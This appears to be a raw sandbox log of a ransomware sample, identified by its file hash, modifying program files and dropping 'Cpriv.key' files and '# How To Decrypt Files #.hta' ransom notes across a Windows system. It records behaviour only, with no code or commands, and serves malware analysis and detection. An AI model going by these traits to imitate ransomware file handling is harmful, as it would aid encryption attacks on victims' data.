de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01178_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00389_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18201_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\alert_obj.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\jvm.hprof.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198113.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0200383.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\ViewHeaderPreview.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Stationery\HandPrints.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft Analysis Services\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-utilities.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107492.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_thunderstorm.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_winxp_olv.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\rtf_alignleft.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\VSTO\vstoee90.tlb de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0195772.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\MEDIA\SUCTION.WAV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\ONINTL.REST.IDX_DLL de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsPrintTemplate.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\js\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_divider_left.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\.lastModified de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ia\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\background.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD02068_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ml\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\button_right.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\System\ado\msado20.tlb de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\DocumentShare\WSSFilesToolHomePageBackground.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\include\win32\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD01196_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178932.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\OrielResume.Dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\ResourceInternal.zip de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\btn-back-static.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_rainy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TN01308_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\PIXEL\PIXEL.ELM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SceneButtonSubpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00269_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0090386.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18257_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\stream_extractor\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\DAO\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\MergeSet.xlsx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\NavigationLeft_ButtonGraphic.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.CA.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\PICCAP98.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Media Player\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\daisies.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\eo.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-jvmstat.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-views_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152556.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\sd\jamendo.luac de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Mail\en-US\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_close_down_BIDI.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Stationery\Stars.htm de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\System\ado\msado27.tlb de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01740_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\baseAltGr_rtl.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309567.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\hy\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\PreviousMenuButtonIcon.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198020.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00274_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\FrameworkList.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\id\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-first-quarter.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\square.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository_1.1.300.v20131211-1531.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\console_view.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287408.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\MLCFG32.CPL de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BrightOrange.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\lv\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\images\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\add_over.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\IN00343_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01046J.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.equinox_1.0.500.v20131211-1531.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\MEDIA\LASER.WAV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\EURO\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_notes-txt-background.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BabyBlue\TAB_OFF.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Locales\fil.pak de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\7-Zip\Lang\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00165_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF\MANIFEST.MF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-host.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\lib\zi\America\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00021_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\URBAN_01.MID de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR40F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\NETWORK\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0093905.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309480.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SoftBlue\TAB_ON.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Reference Assemblies\Microsoft\Framework\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\system_h.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\cs-CZ\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\LINEAR_RGB.pf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TN00018_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\alertIcon.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\TextConv\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.repository_2.3.0.v20131211-1531.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_increaseindent.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\css\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\NavigationUp_ButtonGraphic.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\localedata.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105306.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107722.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\XML Files\Messenger.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\InfoPathOM\Microsoft.Office.InfoPath.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\navBack.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_pt_BR.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.greychart.ui.zh_CN_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_hail.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Median.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\Adobe\Help\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\NavigationRight_ButtonGraphic.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099164.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\notification_plugin.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00640_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Americana.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\tr\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\ko.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\SKY\THMBNAIL.PNG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00546_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099173.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0102984.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\STS2\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-core-kit.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\icon.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\play_hov.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\security\java.policy de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0313965.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01221K.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\RedistList\FrameworkList.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\lv-LV\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-lib-uihandler.xml_hidden de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00369_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME12.CSS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\en-US\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-templates.xml 